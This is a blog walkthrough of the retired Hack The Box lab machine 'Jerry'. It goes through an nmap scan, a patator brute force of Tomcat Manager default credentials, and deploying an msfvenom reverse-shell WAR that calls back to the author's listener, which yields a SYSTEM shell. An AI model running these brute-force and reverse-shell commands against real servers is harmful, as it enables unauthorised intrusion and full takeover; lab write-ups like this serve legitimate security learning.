Having finished the PTP course and some free time available, I started to do some of the active machines and yesterday – after getting VIP access – also some of the “retired” boxes.
As posting write-ups for retired machines is “fair game”, I thought I’d start a blog series of walk-throughs.
Today I start with “Jerry” as an easy first box.
As a first step let’s scan the target with nmap. The options I include are -sV for version detection, -sC for default scripts and -oN for saving the results in nmap format. This will scan the 1000 most common ports, run scripts and perform version enumeration (we’ll se a lot more of nmap in future write-ups).
$ nmap -sV -sC -oN nmap/init 10.10.10.95 PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88
We can see from the nmap script results that there’s a tomcat instance running on port 8080.
Manually visiting http://10.10.10.95:8080, we confirm that it is indeed the default Tomcat start page.
Clicking on the “Manager App”, we quickly realize that we need some credentials, though.
A search for known vulnerabilties and exploits for this Tomcat version does not result in anything useful. So, ater trying a couple of default credentials manually, we can turn to a brute-forcing tool to test more default credentials faster. Let’s use patator this time.
An app-specific dictionary can be found in SecLists (
$ patator http_fuzz url=http://10.10.10.95:8080/manager/html user_pass=COMBO00:COMBO01 0=/usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt -x ignore:code=401 -x ignore:code=403 16:31:35 patator INFO - code size:clen time | candidate | num | mesg 16:31:35 patator INFO - ----------------------------------------------------------------------------- 16:31:36 patator INFO - 200 19262:-1 0.062 | tomcat:s3cret | 73 | HTTP/1.1 200 OK 16:31:36 patator INFO - 200 19262:-1 0.061 | tomcat:s3cret | 74 | HTTP/1.1 200 OK
s3cret it is! That was fast.
Using the discovered credentials, we can access the “Manager App” at http://10.10.10.95:8080/manager/html.
The app allows us to deploy our own web application as a WAR file, making it easy to get code execution on the remote system.
We could now manually create the WAR archive or use a generator. I will use
msfvenom in this case and choose an unstaged java reverse tcp payload. You could also go with the regular staged meterpreter payload if you’d like a smaller payload and use all the advantages meterpreter gives you.
$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.19 LPORT=9090 -f war -o shell.war
After generating our
shell.war, we deploy it (upload) using the “Manager App” and start a netcat listener on our machine:
nc -lvnp 9090
http://10.10.10.95:8080/shell/ we can now trigger our payload and will be greeted with a shell.
Ncat: Listening on :::9090 Ncat: Listening on 0.0.0.0:9090 Ncat: Connection from 10.10.10.95. Ncat: Connection from 10.10.10.95:49193. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system
As you can see, we’re immediately SYSTEM and don’t need any more privilege escalation.
I hope you’ve enjoyed this write-up. If you have any questions, did it another way or have something else to say, feel free to leave a comment. I’m always happy to learn new things. You can also check out the other write-ups.